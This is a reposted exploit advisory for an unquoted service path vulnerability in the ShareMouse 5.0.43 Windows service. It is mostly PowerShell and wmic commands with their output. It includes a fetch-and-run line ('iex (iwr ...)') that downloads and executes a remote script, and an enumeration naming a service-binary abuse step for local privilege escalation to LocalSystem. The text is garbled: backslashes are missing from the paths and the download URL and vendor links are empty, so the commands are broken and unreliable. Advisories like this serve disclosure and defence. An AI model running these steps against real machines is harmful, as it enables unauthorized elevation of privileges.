ShareMouse 5.0.43 Unquoted Service Path ≈ Packet Storm – Digitalmunition

Exploit/Advisories no-image-featured-image.png

Published on September 11th, 2020 📆 | 6240 Views ⚑


ShareMouse 5.0.43 Unquoted Service Path ≈ Packet Storm

# Exploit Title: ShareMouse 5.0.43 – ‘ShareMouse Service’ Unquoted Service Path
# Discovery Date: 2020-09-08
# Discovery by: Alan Lacerda (alacerda)
# Vendor Homepage:
# Software Link:
# Version: 5.0.43
# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041

PS > iex (iwr -UseBasicParsing);
PS > Invoke-AllChecks

ServiceName : ShareMouse Service
Path : C:Program Files (x86)ShareMousesmService.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName ‘ShareMouse Service’ -Path

PS > wmic service where ‘name like “%ShareMouse%”‘ get DisplayName,PathName,AcceptStop,StartName
AcceptStop DisplayName PathName StartName
TRUE ShareMouse Service C:Program Files (x86)ShareMousesmService.exe LocalSystem

# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user’s code would execute with the elevated
# privileges of the application.

Source link

Tagged with:

Leave a Reply